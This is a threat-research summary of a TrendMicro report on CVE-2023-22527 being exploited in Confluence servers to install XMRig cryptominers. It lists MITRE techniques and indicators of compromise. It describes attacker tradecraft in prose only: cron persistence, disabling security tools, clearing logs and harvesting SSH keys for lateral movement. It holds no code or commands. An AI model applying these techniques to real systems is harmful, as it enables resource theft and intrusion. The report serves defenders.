Threat Research

“Analyzing Cryptojacking through CVE-2023-22527: A Deep Dive into a Comprehensive Cryptomining Network”

TrendMicro

The critical vulnerability CVE-2023-22527 in Confluence Data Center and Server is being exploited to turn affected systems into cryptomining networks, using shell scripts, SSH targeting, and cron-based persistence. Organizations are advised to update Confluence and adopt security best practices to defend against these cryptojacking campaigns. #CVE-2023-22527 #Confluence #cryptomining #XMRig #Atlassian

Keypoints

  • CVE-2023-22527 is a critical vulnerability with a CVSS score of 10.
  • Affects Confluence Data Center and Server versions 8.0.x to 8.5.3.
  • Threat actors exploit the vulnerability for cryptojacking activities.
  • Methods of exploitation include using XMRig miners and shell scripts.
  • Attackers kill competing cryptomining processes and maintain persistence through cron jobs.
  • Organizations should update Confluence and implement security best practices.
  • Regular patch management and security audits are recommended.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Exploitation of CVE-2023-22527 for unauthorized access. ‘Exploitation of CVE-2023-22527 for unauthorized access.’
  • [T1059.004] Command and Scripting Interpreter: Unix Shell – Execution of shell scripts for cryptojacking. ‘Execution of shell scripts for cryptojacking.’
  • [T1562.001] Disable or Modify Tools – Uninstalling security services to avoid detection. ‘uninstalling security services to avoid detection.’
  • [T1070.003] Clear Command History – Clearing logs and bash history to hide activities. ‘Clearing logs and bash history to hide activities.’
  • [T1070.002] Clear Linux or Mac System Logs – Removing system logs to cover tracks. ‘Removing system logs to cover tracks.’
  • [T1105] Ingress Tool Transfer – Downloading mining tools and scripts to the compromised system. ‘Downloading mining tools and scripts to the compromised system.’
  • [T1053.003] Scheduled Task/Job: Cron – Creating cron jobs to maintain persistence. ‘Creating cron jobs to maintain persistence.’
  • [T1005] Data from Local System – Gathering user information and SSH configurations for lateral movement. ‘Gathering user information and SSH configurations for lateral movement.’
  • [T1496] Resource Hijacking – Utilizing victim’s resources for cryptomining activities. ‘Utilizing victim’s resources for cryptomining activities.’

Indicators of Compromise

  • [File name] – solr.sh, mining configuration file, and other mining-related scripts (used to deploy and run miners on compromised systems)
  • [Process] – XMRig miner, mining processes – used to perform cryptomining on infected hosts
  • [SSH/Credential] – SSH configurations and keys found in local data (gathered for lateral movement via SSH)
  • [Wallet] – wallet addresses or wallet information stored in JSON files (wallet information from the JSON file)
  • [IP/Network] – local IP address and SSH endpoints used to spread to other hosts

Read more: https://www.trendmicro.com/en_us/research/24/h/cve-2023-22527-cryptomining.html

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint